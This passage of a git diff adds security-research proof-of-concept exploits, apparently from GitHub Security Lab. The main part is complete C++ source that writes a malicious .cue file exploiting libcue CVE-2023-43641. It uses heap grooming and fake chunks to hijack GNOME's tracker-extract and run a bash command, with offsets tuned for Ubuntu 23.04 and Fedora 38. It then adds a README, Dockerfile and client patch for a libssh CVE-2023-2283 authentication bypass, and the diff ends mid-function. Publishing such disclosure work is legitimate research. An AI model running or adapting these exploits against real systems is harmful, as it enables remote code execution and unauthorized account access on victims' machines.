"PERFORMER", track.performer_); + write_cdtext(buf, 7, "SONGWRITER", track.songwriter_); + write_cdtext(buf, 11, "GENRE", track.genre_); + write_cdtext(buf, 13, "MESSAGE", track.message_); +} + +static bool is_valid_string_byte(uint8_t x) { return x != 0 && x != '"'; } + +static void create_fake_chunk(WriteBuf &buf, size_t track_offset, + uint16_t offset, uint16_t chunksize) { + char str[256]; + const uint8_t lowbyte = offset & 0xff; + const uint8_t highbyte = offset >> 8; + assert(is_valid_string_byte(lowbyte)); + assert(is_valid_string_byte(highbyte)); + snprintf(str, sizeof(str), + "long string to overwrite low bytes of address " + " %c%c", + lowbyte, highbyte); + write_cdtext(buf, 7, "TITLE", str); + set_index(buf, -(track_offset + 0x90 - offset) / 8, + chunksize); // overwrite size of string chunk + buf.write_string("FILE pwned.mp3 MP3\n"); +} + +enum Target { Ubuntu23_04, Fedora38, NumTargets }; + +static void write_ghsecuritylab_track(WriteBuf &buf, size_t &tracknum, + Target target) { + Track track = { + "Copyright (c) 2023 GitHub, Inc.", + "[GitHub Security Lab](https://securitylab.github.com/)", + 0, + "[Kevin Backhouse](https://github.com/kevinbackhouse) " + "\n ", + " " + "\n ", + "[The Malloc " + "Maleficarum](https://seclists.org/bugtraq/2005/Oct/118).\nSee also: " + "[how2heap](https://github.com/shellphish/how2heap).\n " + " ", + "Proof-of-concept exploit for libcue CVE-2023-43641 (GHSL-2023-197): out " + "of bounds\narray access in track_set_index. The vulnerability is used " + "to get code execution in GNOME's\ntracker-extract. Download this file " + "to pop a calc.", + }; + + char arranger[80]; + const char *targetnames[NumTargets] = {"Ubuntu 23.04 (Lunar Lobster)", + "Fedora 38"}; + snprintf(arranger, sizeof(arranger), + "\nThis version of the poc is tuned for %s " + " ", + targetnames[target]); + arranger[71] = '\n'; + arranger[72] = '\0'; + + track.arranger_ = arranger; + write_complete_track(buf, tracknum, track); +} + +Target select_target(const char *target) { + if (strcmp(target, "Ubuntu23_04") == 0) { + return Ubuntu23_04; + } + if (strcmp(target, "Fedora38") == 0) { + return Fedora38; + } + fprintf(stderr, "Target not recognized: %s\n", target); + exit(EXIT_FAILURE); +} + +int main(int argc, char *argv[]) { + const uint16_t chunksize_track = 0x3b5; + const size_t rawbuf_len = 0x10000 - 0x20; + uint8_t *rawbuf = (uint8_t *)malloc(rawbuf_len); + size_t tracknum = 0; + size_t track_offset = 0; + + if (argc != 2) { + fprintf(stderr, "usage: \nmkcue Ubuntu23_04\nmkcue Fedora38\n"); + return EXIT_FAILURE; + } + + const Target target = select_target(argv[1]); + + const size_t cd_ntracks_offsets[NumTargets] = {0x12608, 0x12868}; + const size_t cd_ntrack_offset = cd_ntracks_offsets[target]; + + WriteBuf buf(rawbuf, rawbuf_len); + + buf.write_string("PERFORMER Kev\n"); + write_cdtext(buf, 0, "TITLE", "Kev'z Warez"); + buf.write_string("FILE pwned.mp3 MP3\n"); + + buf.write_string("\n"); + new_track(buf, tracknum); + write_cdtext(buf, 15, "MESSAGE", + "First some [heap feng " + "shui](https://en.wikipedia.org/wiki/Heap_feng_shui):\nallocate " + "memory so that all subsequent allocations come from a " + "continguous block of\nmemory. For example, this string is 251 " + "characters long to use a chunk from tcache\nindex 15."); + + // Use more memory. + new_track(buf, tracknum); + write_cdtext(buf, 5, "TITLE", + "A Track is 0x3a8 bytes, so creating many new tracks is a quick " + "way to use lots of memory."); + + for (size_t i = 0; i < 31; i++) { + new_track(buf, tracknum); + write_cdtext(buf, 5, "TITLE", + "Again " + " "); + } + + buf.write_string("\n"); + write_complete_track(buf, tracknum, track_fengshui1); + buf.write_string("\n"); + write_ghsecuritylab_track(buf, tracknum, target); + buf.write_string("\n"); + write_complete_track(buf, tracknum, track_rickroll); + for (size_t i = 0; i < 11; i++) { + write_complete_track(buf, tracknum, track_fengshui2); + } + + new_track(buf, tracknum); + const size_t offsets1[NumTargets] = {0x17f00, 0x18200}; + track_offset = offsets1[target]; + write_cdtext(buf, 1, "TITLE", "for freeing to tcache index 1"); + write_cdtext(buf, 0, "TITLE", "free previous title"); + + // Overwrite cd->ntrack so that the next track pointer will be + // written to offset 0xd50. + set_cd_ntrack(buf, cd_ntrack_offset, track_offset, 0xd50); + + new_track(buf, tracknum); + const size_t offsets2[NumTargets] = {0x184b0, 0x187b0}; + track_offset = offsets2[target]; + write_cdtext(buf, 1, "TITLE", "Allocate previously freed string"); + set_index(buf, -0x1c, 0x95); // overwrite size of string chunk + + // This overwrites cd->ntrack. Every time a new track is allocated, + // its address is written to cd->track[cd->ntrack - 1]. The value + // of cd->ntrack is also incremented each time. I want to use this + // on the 5th new_track after this point, to overwrite offset + // 0xdd0 because that's going to be the location of my g_class struct + // and I need to set its g_type field. + set_cd_ntrack(buf, cd_ntrack_offset, track_offset, 0xdb0); + + // Use a fake chunk to overwrite the low bytes of info->file + // so that it points to offset 0xd50, which is where I'll create + // the fake file struct. + create_fake_chunk(buf, track_offset, 0xcf0, 0x45); + write_cdtext(buf, 2, "GENRE", + "set low bytes of info->file \x50\x0d"); + + // Use a fake chunk to overwrite the low bytes of info->file->g_class + // so that it points to offset 0xdd0, which is where I'll create + // the fake g_class + create_fake_chunk(buf, track_offset, 0xd30, 0x35); + write_cdtext(buf, 1, "PERFORMER", "set low bytes of file->g_class \xd0\x0d"); + + set_index(buf, -(track_offset + 0x88 - 0xd10) / 8, 0); // info->resource = 0 + + // Fake chunk for overwriting the lower bytes of info->file->g_class (later). + create_fake_chunk(buf, track_offset, 0xf10, 0x55); + + // Fake chunk for overwriting the tcache (immediately below). + create_fake_chunk(buf, track_offset, 0x9b0, 0x45); + + // Create a fake chunk at offset 0xe20, then overwrite its lower bytes in + // the tcache to change it to 0xe60. The chunk size (0x115) is chosen so + // it is stored in tcache->entries[15] (offset 0x9d8), which means that I + // can overwrite its lower bytes by writing a string to the fake chunk at + // offset 0x9b0. + const uint16_t chunksize_e60 = 0x115; + create_fake_chunk(buf, track_offset, 0xe20, chunksize_e60); + + write_cdtext(buf, 2, "MESSAGE", + "set low bytes of tcache->entries[15] \x60\x0e"); + write_cdtext(buf, 0, "MESSAGE", "kevwozere"); + + // Create a fake chunk at offset 0xdd0. + create_fake_chunk(buf, track_offset, 0xdd0, 0x55); + + // track->file.start is at offset 0x30 in track + // track->file.length is at offset 0x38 in track + // track->index[0] is at offset 0x88 in track + // track->zero_pre.length is at offset 0x18 in track + // + // Series of calculations: + // + // prev_track->file.length = X - prev_track->file.start + // track->zero_pre.length = Y - track->index[0] + // + // So I want to prev_track->file.length and track->index[0] to be + // at the same address. Which means: + // + // prev_track + 0x38 == track + 0x88 + // + // In other words: track == prev_track - 0x50 + + // Create a fake track-sized chunk at offset 0xde0. + create_fake_chunk(buf, track_offset, 0xde0, chunksize_track); + + // Create a fake track-sized chunk at offset 0xe30. + create_fake_chunk(buf, track_offset, 0xe30, chunksize_track); + + write_cdtext(buf, 15, "TITLE", + "long title to allocate 0x110-sized chunk. " + " " + " " + " "); + new_track(buf, tracknum); // Allocate a track at offset 0xe30 + set_index(buf, -0x35, 0); // info->resource = 0 + set_index(buf, -0x31, 1); // info->ref_count = 1 + set_index(buf, -0x2a, 0); // self->launcher = 0 + set_index(buf, -0x29, 0); // self->flags = 0 + + new_track(buf, tracknum); // Allocate a track at offset 0xde0 + track_offset = 0xde0; + + write_cdtext( + buf, 3, "TITLE", + "Overwrite low bytes of track->file.name \x60\x0e"); + set_index(buf, -2, chunksize_e60); + buf.write_string("FILE \"wen poc?\" MP3\n"); + + // Create a fake track-sized chunk at offset 0xee0 + write_cdtext( + buf, 3, "TITLE", + "Overwrite low bytes of track->file.name \xe0\x0e"); + set_index(buf, 0xe, chunksize_track); + buf.write_string("FILE pwned.mp3 MP3\n"); + + // Create a fake track-sized chunk at offset 0xf30 + write_cdtext( + buf, 3, "TITLE", + "Overwrite low bytes of track->file.name \x30\x0f"); + set_index(buf, 0x18, chunksize_track); + buf.write_string("FILE pwned.mp3 MP3\n"); + + // Create a fake 0x30-sized chunk at offset 0xdb0. It will be used later to + // overwrite the pointer to the g_type stored at offset 0xdd0 (element 0 of + // the g_class). + write_cdtext( + buf, 3, "TITLE", + "Overwrite low bytes of track->file.name \xb0\x0d"); + set_index(buf, -0x18, 0x35); + buf.write_string("FILE pwned.mp3 MP3\n"); + + // Use the two overlapping tracks to apply arithmetic + set_index(buf, 0, -1); // reset prev_track->file.length + set_index(buf, 1, 0); + const size_t codeoffsets1[NumTargets] = {0x1cdff0, 0x1cae20}; + set_index(buf, 1, codeoffsets1[target]); // Offset from + // g_file_input_stream_real_query_info_finish + // to g_option_context_parse + + set_index(buf, 0xe, 0); // Zero a field that causes a crash in gatomicarray.c + + new_track(buf, tracknum); // Allocate a track at offset 0xf30 + buf.write_string("FLAGS\n"); // The grammar requires at least one track + // statement between tracks + new_track(buf, tracknum); // Allocate a track at offset 0xee0 + track_offset = 0xee0; + + buf.write_string( + "ISRC " + "looooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo" + "oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo" + "oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooog-" + "string-to-allocate-0x110-sized-chunk\n"); + // Allocate 0x50-sized chunk at offset 0xf10. + write_cdtext(buf, 3, "TITLE", + "long title to overwrite low bytes of track->isrc " + " \x60\x0f"); + set_index(buf, -2, 0x115); + buf.write_string("ISRC short-string\n"); + + set_index(buf, 0, -1); // reset prev_track->file.length + set_index(buf, 1, 0); + const size_t codeoffsets2[NumTargets] = {0x3b290, 0x3d290}; + set_index(buf, 1, codeoffsets2[target]); // Offset from + // g_file_input_stream_real_query_info_finish + // to initable_init + + // Zero the tcache + set_index(buf, -0xd0, 0); + set_index(buf, -0xce, 0); + + set_index(buf, -0x19, 100); // info->file->g_class->g_type->ref_count = 100 + set_index(buf, -0x17, 0); // info->file->g_class->g_type->nsupers = 0 + set_index(buf, -0x10, 0x50); // info->file->g_class->g_type->supers[0] = 0x50 + + new_track(buf, tracknum); // write a pointer to 0xdd0 + const size_t offsets3[NumTargets] = {0x19290, 0x19590}; + track_offset = offsets3[target]; + + // Overwrite cd->ntrack so that the next track pointer will get written + // to offset 0xeb8 (the location of cancellable->priv) + set_cd_ntrack(buf, cd_ntrack_offset, track_offset, 0xeb8); + new_track(buf, tracknum); // This track is cancellable->priv. + const size_t offsets4[NumTargets] = {0x197f0, 0x19af0}; + track_offset = offsets4[target]; + set_index(buf, -0x11, 0); // cancellable->priv->cancelled = 0 + + // Overwrite cd->ntrack so that the next track pointer will get written + // to offset 0xd78 (the location of self->argv) + set_cd_ntrack(buf, cd_ntrack_offset, track_offset, 0xd78); + new_track(buf, tracknum); // This track is the argv array. (offset 0x19d50) + const size_t offsets5[NumTargets] = {0x19d50, 0x1a050}; + track_offset = offsets5[target]; + const size_t argv_offset = track_offset; + set_index(buf, -0xe, 0); // argv[3] = 0 + + // Overwrite cd->ntrack so that the next track pointer will get written + // to offset 0x19d50 (the location of self->argv[0]) + set_cd_ntrack(buf, cd_ntrack_offset, argv_offset, argv_offset); + write_cdtext(buf, 6, "TITLE", + "Temporary long title for tcache index 6 " + " "); + write_cdtext(buf, 0, "TITLE", "short title"); + new_track(buf, tracknum); // this will be argv[0] (offset 0x1a350) + const size_t offsets6[NumTargets] = {0x1a350, 0x1a650}; + track_offset = offsets6[target]; + write_cdtext(buf, 6, "TITLE", + "Use long title from tcache index 6 " + " "); + set_index(buf, -0x26, 0xc5); // overwrite size of string chunk + write_cdtext(buf, 10, "TITLE", + " " + " " + " /bin/bash"); + + // Overwrite cd->ntrack so that the next track pointer will get written + // to offset 0x19d58 (the location of self->argv[1]) + set_cd_ntrack(buf, cd_ntrack_offset, track_offset, argv_offset + 0x8); + + new_track(buf, tracknum); // This track is argv[1]. (offset 0x1a8b0) + const size_t offsets7[NumTargets] = {0x1a8b0, 0x1abb0}; + track_offset = offsets7[target]; + uint32_t x = 0; + strcpy((char *)&x, "-c"); + set_index(buf, -0x11, x); + + // Overwrite cd->ntrack so that the next track pointer will get written + // to offset 0x19d60 (the location of self->argv[2]). + set_cd_ntrack(buf, cd_ntrack_offset, track_offset, argv_offset + 0x10); + + write_cdtext(buf, 6, "TITLE", + "Temporary long title for tcache index 6 " + " "); + write_cdtext(buf, 0, "TITLE", "eta son"); + new_track(buf, tracknum); // this will be argv[2] + write_cdtext(buf, 6, "TITLE", + "Use long title from tcache index 6 " + " "); + set_index(buf, -0x26, 0x165); // overwrite size of string chunk + write_cdtext( + buf, 20, "TITLE", + "This command is going to get called repeatedly in an infinite loop, so " + "send SIGSTOP to avoid a fork-bomb and use flock so only one calculator " + "starts. killall -SIGSTOP tracker-extract-3; flock -w 3 " + "~/Downloads/pwned.lock -c 'gnome-calculator -e 1337' && (sleep 10; rm " + "~/Downloads/pwned.lock; killall -SIGKILL tracker-extract-3)"); + + // To stop tracker-extract from crashing in g_option_context_parse + // immediately after it is has called initable_init, overwrite the + // next pointer of context->groups to add another link to the linked + // list, and point the next pointer back to offset 0xdd0 to create + // an infinite list. The loop will keep spinning until we have + // a chance to kill tracker-extract cleanly. + const size_t offsets8[NumTargets] = {0x1aeb0, 0x1b1b0}; + track_offset = offsets8[target]; + + // Overwrite cd->ntrack so that the next track pointer will be + // written to offset 0xdd8. + set_cd_ntrack(buf, cd_ntrack_offset, track_offset, 0xdd8); + + write_cdtext(buf, 6, "PERFORMER", + "Temporary long name for tcache index 6 " + " "); + write_cdtext(buf, 0, "PERFORMER", "short name"); + + new_track(buf, tracknum); // This will be another link in context->groups + const size_t offsets9[NumTargets] = {0x1b4b0, 0x1b7b0}; + track_offset = offsets9[target]; + const size_t link_offset = track_offset; + + // Overwrite cd->ntrack so that the next track pointer will be + // written to offset 0x8 within the current track. + set_cd_ntrack(buf, cd_ntrack_offset, track_offset, link_offset + 8); + + write_cdtext(buf, 6, "TITLE", + "Use chunk from tcache index 6 " + " "); + set_index(buf, -0x26, 0xc5); // overwrite size of string chunk + write_cdtext(buf, 0, "TITLE", "short title"); + + // The only purpose of this track is to write a pointer at offset 0x8 in + // the previous track. I'll overwrite the bottom bytes of that pointer so + // that it points to offset 0xdd0. + new_track(buf, tracknum); + const size_t offsets10[NumTargets] = {0x1ba30, 0x1bd30}; + track_offset = offsets10[target]; + + // Overwrite cd->ntrack so that the next track pointer will be + // written to offset 0x0 within the previous track. + set_cd_ntrack(buf, cd_ntrack_offset, track_offset, link_offset); + write_cdtext(buf, 10, "TITLE", + " " + " " + " \xd0\x0d"); + + tracknum = 1337; + new_track(buf, tracknum); // fake GOptionGroup + set_index(buf, -0x6, 0); // zero the pre_parse_func field + + write_cdtext(buf, 2, "TITLE", + "Use the chunk that is still in tcache index 2"); + write_cdtext(buf, 1, "MESSAGE", "pop that calc \xa0\x0e"); + buf.write_string("REM DATE \"1992 AD\"\n"); + + // Pad the file with newline characters. + buf.write_many('\n', rawbuf_len - buf.offset()); + + buf.write_to_fd(STDOUT_FILENO); + free(rawbuf); + + return 0; +} diff --git a/SecurityExploits/libcue/track_set_index_CVE-2023-43641/search-bar-screenshot.png b/SecurityExploits/libcue/track_set_index_CVE-2023-43641/search-bar-screenshot.png new file mode 100644 index 0000000..c4f1e3c Binary files /dev/null and b/SecurityExploits/libcue/track_set_index_CVE-2023-43641/search-bar-screenshot.png differ diff --git a/SecurityExploits/libcue/track_set_index_CVE-2023-43641/utils.cpp b/SecurityExploits/libcue/track_set_index_CVE-2023-43641/utils.cpp new file mode 100644 index 0000000..a300524 --- /dev/null +++ b/SecurityExploits/libcue/track_set_index_CVE-2023-43641/utils.cpp @@ -0,0 +1,97 @@ +#include "utils.h" +#include +#include +#include + +// Write a uint8_t to starting address &buf[pos]. +size_t WriteBuf::write_uint8_at(size_t pos, uint8_t x) { + assert(bufsize_ >= pos); + assert(bufsize_ - pos >= sizeof(uint8_t)); + buf_[pos++] = x; + return pos; +} + +// Write a uint16_t to starting address &buf_[pos] (in big endian +// order). +size_t WriteBuf::write_uint16_at(size_t pos, uint16_t x) { + assert(bufsize_ >= pos); + assert(bufsize_ - pos >= sizeof(uint16_t)); + buf_[pos++] = (x >> 8) & 0xFF; + buf_[pos++] = x & 0xFF; + return pos; +} + +// Write a uint32_t to starting address &buf_[pos] (in big endian +// order). +size_t WriteBuf::write_uint32_at(size_t pos, uint32_t x) { + assert(bufsize_ >= pos); + assert(bufsize_ - pos >= sizeof(uint32_t)); + buf_[pos++] = (x >> 24) & 0xFF; + buf_[pos++] = (x >> 16) & 0xFF; + buf_[pos++] = (x >> 8) & 0xFF; + buf_[pos++] = x & 0xFF; + return pos; +} + +// Write a block of bytes to starting address &buf_[pos]. +size_t WriteBuf::write_many_at(size_t pos, uint8_t x, size_t n) { + assert(bufsize_ >= pos); + assert(bufsize_ - pos >= n); + memset(&buf_[pos], x, n); + pos += n; + return pos; +} + +// Write a string to starting address &buf_[pos]. +size_t WriteBuf::write_bytes_at(size_t pos, const uint8_t *bytes, size_t n) { + assert(bufsize_ >= pos); + assert(bufsize_ - pos >= n); + memcpy(&buf_[pos], bytes, n); + pos += n; + return pos; +} + +// Write a uint8_t to starting address &buf[offset_]. +void WriteBuf::write_uint8(uint8_t x) { offset_ = write_uint8_at(offset_, x); } + +// Write a uint16_t to starting address &buf_[offset_] (in big endian +// order). +void WriteBuf::write_uint16(uint16_t x) { + offset_ = write_uint16_at(offset_, x); +} + +// Write a uint32_t to starting address &buf_[offset_] (in big endian +// order). +void WriteBuf::write_uint32(uint32_t x) { + offset_ = write_uint32_at(offset_, x); +} + +// Write a block of bytes to starting address &buf_[offset_]. +void WriteBuf::write_many(uint8_t x, size_t n) { + offset_ = write_many_at(offset_, x, n); +} + +// Write n bytes to starting address &buf_[offset_]. +void WriteBuf::write_bytes(const uint8_t *bytes, size_t n) { + offset_ = write_bytes_at(offset_, bytes, n); +} + +// Write a string to starting address &buf_[offset_]. +void WriteBuf::write_string(const char *str) { + write_bytes(reinterpret_cast(str), strlen(str)); +} + +size_t WriteBuf::offset() const { return offset_; } + +// Inserts an n-byte gap, so that the bytes can be written later. This is +// usually used for size or offset fields that need to be calculated +// later. +size_t WriteBuf::insert_gap(size_t n) { + const size_t pos = offset_; + assert(bufsize_ >= pos); + assert(bufsize_ - pos >= n); + offset_ = pos + n; + return pos; +} + +void WriteBuf::write_to_fd(int fd) { write(fd, buf_, offset_); } diff --git a/SecurityExploits/libcue/track_set_index_CVE-2023-43641/utils.h b/SecurityExploits/libcue/track_set_index_CVE-2023-43641/utils.h new file mode 100644 index 0000000..ce595d7 --- /dev/null +++ b/SecurityExploits/libcue/track_set_index_CVE-2023-43641/utils.h @@ -0,0 +1,57 @@ +#include +#include + +class WriteBuf { + uint8_t* buf_; + const size_t bufsize_; + size_t offset_ = 0; + +public: + WriteBuf(uint8_t* buf, size_t bufsize) : buf_(buf), bufsize_(bufsize) {} + + // Write a uint8_t to starting address &buf[pos]. + size_t write_uint8_at(size_t pos, uint8_t x); + + // Write a uint16_t to starting address &buf_[pos] (in big endian + // order). + size_t write_uint16_at(size_t pos, uint16_t x); + + // Write a uint32_t to starting address &buf_[pos] (in big endian + // order). + size_t write_uint32_at(size_t pos, uint32_t x); + + // Write a block of bytes to starting address &buf_[pos]. + size_t write_many_at(size_t pos, uint8_t x, size_t n); + + // Write a string to starting address &buf_[pos]. + size_t write_bytes_at(size_t pos, const uint8_t* bytes, size_t n); + + // Write a uint8_t to starting address &buf[offset_]. + void write_uint8(uint8_t x); + + // Write a uint16_t to starting address &buf_[offset_] (in big endian + // order). + void write_uint16(uint16_t x); + + // Write a uint32_t to starting address &buf_[offset_] (in big endian + // order). + void write_uint32(uint32_t x); + + // Write a block of bytes to starting address &buf_[offset_]. + void write_many(uint8_t x, size_t n); + + // Write n bytes to starting address &buf_[offset_]. + void write_bytes(const uint8_t* bytes, size_t n); + + // Write a string to starting address &buf_[offset_]. + void write_string(const char* str); + + size_t offset() const; + + // Inserts an n-byte gap, so that the bytes can be written later. This is + // usually used for size or offset fields that need to be calculated + // later. + size_t insert_gap(size_t n); + + void write_to_fd(int fd); +}; diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/README.md b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/README.md new file mode 100644 index 0000000..6cfb209 --- /dev/null +++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/README.md @@ -0,0 +1,104 @@ +# Public key authentication bypass in libssh (CVE-2023-2283) + +[CVE-2023-2283](https://securitylab.github.com/advisories/GHSL-2023-085_libssh/) +is an authentication bypass vulnerability in +[libssh](https://www.libssh.org/), which, under certain conditions, may +enable a remote attacker to gain unauthorized access to another user’s +account via ssh login. + +This demo uses docker to simulate two computers, named "libssh-server" +and "libssh-attacker". On libssh-server, we run `ssh_server_pthread`, +which is a simple ssh server application that is [included as an +example](https://gitlab.com/libssh/libssh-mirror/-/blob/e8322817a9e5aaef0698d779ddd467a209a85d85/examples/ssh_server.c) +with the libssh source code. The server is configured to allow public +key authentication with an ED25519 key, but the attacker does not know the +private key. The attacker instead authenticates by triggering the vulnerability. + +The vulnerability is triggered when `ssh_server_pthread` hits an +out-of-memory condition at precisely the right moment. If libssh is +running on a 64-bit server with plenty of RAM then it is very unlikely +that an attacker will be able to generate enough memory pressure to +cause an out-of-memory error, which means that the vulnerability is +unlikely to be exploitable. The goal of this demo is, instead, to show +that the vulnerability is exploitable if libssh is running in a +memory-constrained environment such as a [memory-constrained +container](https://docs.docker.com/config/containers/resource_constraints/), +which we believe is a realistic scenario for a real-life libssh deployment. +The demo uses `ulimit` to set a 256MB memory limit on the ssh server. + +## Network setup + +Create a docker network bridge, to simulate a network with two separate computers. + +``` +docker network create -d bridge --subnet 172.18.0.0/16 libssh-demo-network +``` + +## Server setup + +Build the docker image: + +``` +docker build server -t libssh-server --build-arg UID=`id -u` +``` + +Start the container: + +``` +docker run --rm --network libssh-demo-network --ip=172.18.0.10 -it libssh-server +``` + +If you want to be able to debug the libssh server, then you need to start the container with some extra command line arguments: + +``` +docker run --rm --network libssh-demo-network --ip=172.18.0.10 --cap-add=SYS_PTRACE --security-opt seccomp=unconfined -it libssh-server +``` + +Inside the container, run these commands to create ssh keys for the server: + +``` +mkdir ~/testkeys +ssh-keygen -P "" -t ecdsa -f ~/testkeys/id_ecdsa +ssh-keygen -P "" -t rsa -f ~/testkeys/id_rsa +``` + +Start the server: + +``` +ulimit -v 262144 # 256MB +~/libssh/build/examples/ssh_server_pthread -p 2022 -r ~/testkeys/id_rsa -e ~/testkeys/id_ecdsa -a ~/.ssh/authorized_keys 0.0.0.0 +``` + +Note: ssh servers normally listen on port 22, but root privileges are required to listen on 22, so this demo uses port 2022 instead. Use `sudo` if you want to change the port number to 22. The `sudo` password in this docker container is "x". + +## Attacker setup + +Build the docker image: + +``` +docker build attacker -t libssh-attacker --build-arg UID=`id -u` +``` + +Start the container: + +``` +docker run --rm --network libssh-demo-network --ip=172.18.0.11 -it libssh-attacker +``` + +If you want to be able to debug the client, then you need to start the container with some extra command line arguments: + +``` +docker run --rm --network libssh-demo-network --ip=172.18.0.11 --cap-add=SYS_PTRACE --security-opt seccomp=unconfined -it libssh-attacker +``` + +The attacker uses a modified version of libssh. The modifications are in the file named `diff.txt` and are applied during the `docker build` step. + +Run the malicious client like this: + +``` +~/libssh/build/examples/ssh-client -p 2022 victim@172.18.0.10 ~/id_ed25519.pub +``` + +The vulnerability is triggered when the ssh server has an out-of-memory error at the exact right moment, which means that the PoC is unreliable. It runs in a loop until it's successful, which can often take several minutes. You may also need to run several instance of the PoC simultaneously to generate enough memory pressure on the server. I suggest using `tmux` to open three terminals and start 3 instances of the PoC. When one of the PoCs succeeds, it creates a file named "success.txt", which notifies the other instances that they should stop. + +Note: the PoC sometimes accidentally triggers a SIGSEGV in the server due to an unrelated [null-pointer dereference bug](https://gitlab.com/libssh/libssh-mirror/-/merge_requests/381). If this happens, you will need to restart the `ssh_server_pthread` process. diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/Dockerfile b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/Dockerfile new file mode 100644 index 0000000..21837c6 --- /dev/null +++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/Dockerfile @@ -0,0 +1,35 @@ +FROM ubuntu:22.04 + +ENV DEBIAN_FRONTEND=noninteractive + +RUN apt-get update && \ + apt-get install -y \ + sudo tmux emacs git gdb cmake build-essential net-tools psmisc \ + libssl-dev zlib1g-dev libkrb5-dev libkrb5-dbg + +ARG UID=1000 + +# Create a non-root user account to run libssh. +RUN adduser attacker --disabled-password --uid $UID + +# Grant the 'attacker' user sudo access. This is not used for the demo, +# but it is often handy for installing extra packages. +RUN adduser attacker sudo +RUN echo "attacker:x" | chpasswd +COPY home/ /home/attacker/ +RUN chown -R attacker:attacker /home/attacker + +# Switch over to the 'attacker' user, since root access is no longer required +USER attacker +WORKDIR /home/attacker + +# Clone and build libssh v0.10.4 +RUN git clone https://git.libssh.org/projects/libssh.git && \ + cd libssh && \ + git checkout e8322817a9e5aaef0698d779ddd467a209a85d85 && \ + git apply ~/diff.txt && \ + mkdir build && cd build && \ + cmake .. && \ + make -j $(nproc) + +USER attacker diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/.bash_history b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/.bash_history new file mode 100644 index 0000000..5df6160 --- /dev/null +++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/.bash_history @@ -0,0 +1 @@ +~/libssh/build/examples/ssh-client -p 2022 victim@172.18.0.10 ~/id_ed25519.pub diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/.tmux.conf b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/.tmux.conf new file mode 100644 index 0000000..f2da785 --- /dev/null +++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/.tmux.conf @@ -0,0 +1,11 @@ +# Enable 256 colors +set -g default-terminal "screen-256color" + +# Enable using the mouse to switch windows. +set -g mouse on + +# Don't lose track of SSH_AGENT etc. from parent environment. +set -g update-environment -r + +# history buffer size +set-option -g history-limit 100000 diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/diff.txt b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/diff.txt new file mode 100644 index 0000000..c56191d --- /dev/null +++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/diff.txt @@ -0,0 +1,399 @@ +diff --git a/examples/ssh_client.c b/examples/ssh_client.c +index aaf0cb5b..4055a2c5 100644 +--- a/examples/ssh_client.c ++++ b/examples/ssh_client.c +@@ -32,10 +32,12 @@ + #include + #endif + ++#include + #include + #include + #include + #include ++#include + + #include + #include +@@ -47,6 +49,7 @@ + + static char *host = NULL; + static char *user = NULL; ++static char *pubkey_filename = NULL; + static char *cmds[MAXCMD]; + static char *config_file = NULL; + static struct termios terminal; +@@ -89,7 +92,7 @@ static void add_cmd(char *cmd) + static void usage(void) + { + fprintf(stderr, +- "Usage : ssh [options] [login@]hostname\n" ++ "Usage : ssh [options] [login@]hostname pubkey_file\n" + "sample client - libssh-%s\n" + "Options :\n" + " -l user : log in as user\n" +@@ -134,12 +137,15 @@ static int opts(int argc, char **argv) + if (optind < argc) { + host = argv[optind++]; + } ++ if (optind < argc) { ++ pubkey_filename = argv[optind++]; ++ } + + while(optind < argc) { + add_cmd(argv[optind++]); + } + +- if (host == NULL) { ++ if (host == NULL || pubkey_filename == NULL) { + return -1; + } + +@@ -321,12 +327,27 @@ static void batch_shell(ssh_session session) + ssh_channel_free(channel); + } + +-static int client(ssh_session session) ++static void kill_procs(const int nprocs, pid_t *cpids) { ++ int i; ++ for (i = 0; i+1 < nprocs; i++) { ++ const pid_t cpid = cpids[i]; ++ if (cpid > 0) { ++ cpids[i] = -1; ++ kill(cpid, SIGTERM); ++ waitpid(cpid, 0, 0); ++ } ++ } ++} ++ ++static int client(ssh_session session, const int myid, const int nprocs, pid_t *cpids) + { +- int auth = 0; + char *banner; + int state; ++ int result; + ++ if (ssh_options_set(session, SSH_OPTIONS_COMPRESSION_C_S, "zlib") < 0) { ++ return -1; ++ } + if (user) { + if (ssh_options_set(session, SSH_OPTIONS_USER, user) < 0) { + return -1; +@@ -352,6 +373,7 @@ static int client(ssh_session session) + fprintf(stderr, "Connection failed : %s\n", ssh_get_error(session)); + return -1; + } ++ printf("connection successful: %d\n", myid); + + state = verify_knownhost(session); + if (state != 0) { +@@ -364,16 +386,21 @@ static int client(ssh_session session) + printf("%s\n", banner); + free(banner); + } +- auth = authenticate_console(session); +- if (auth != SSH_AUTH_SUCCESS) { ++ result = ssh_bypass_auth(session, pubkey_filename, myid, nprocs); ++ if (myid == 0) { ++ kill_procs(nprocs, cpids); ++ } ++ if (result < 0) { + return -1; ++ } else { ++ // Write a file named success.txt ++ close(open("success.txt", O_WRONLY | O_CREAT, S_IRUSR | S_IWUSR)); + } + if (cmds[0] == NULL) { + shell(session); + } else { + batch_shell(session); + } +- + return 0; + } + +@@ -406,9 +433,48 @@ static void cleanup_pcap(void) + pcap = NULL; + } + +-int main(int argc, char **argv) ++static int run(int argc, char **argv) + { + ssh_session session; ++ pid_t cpids[5]; ++ int result; ++ ++ // Fork a few times to increase the amount of memory pressure on the server. ++ const int nprocs = 1 + (rand() % (1 + sizeof(cpids)/sizeof(cpids[0]))); ++ int myid; ++ printf("nprocs = %d\n", nprocs); ++ for 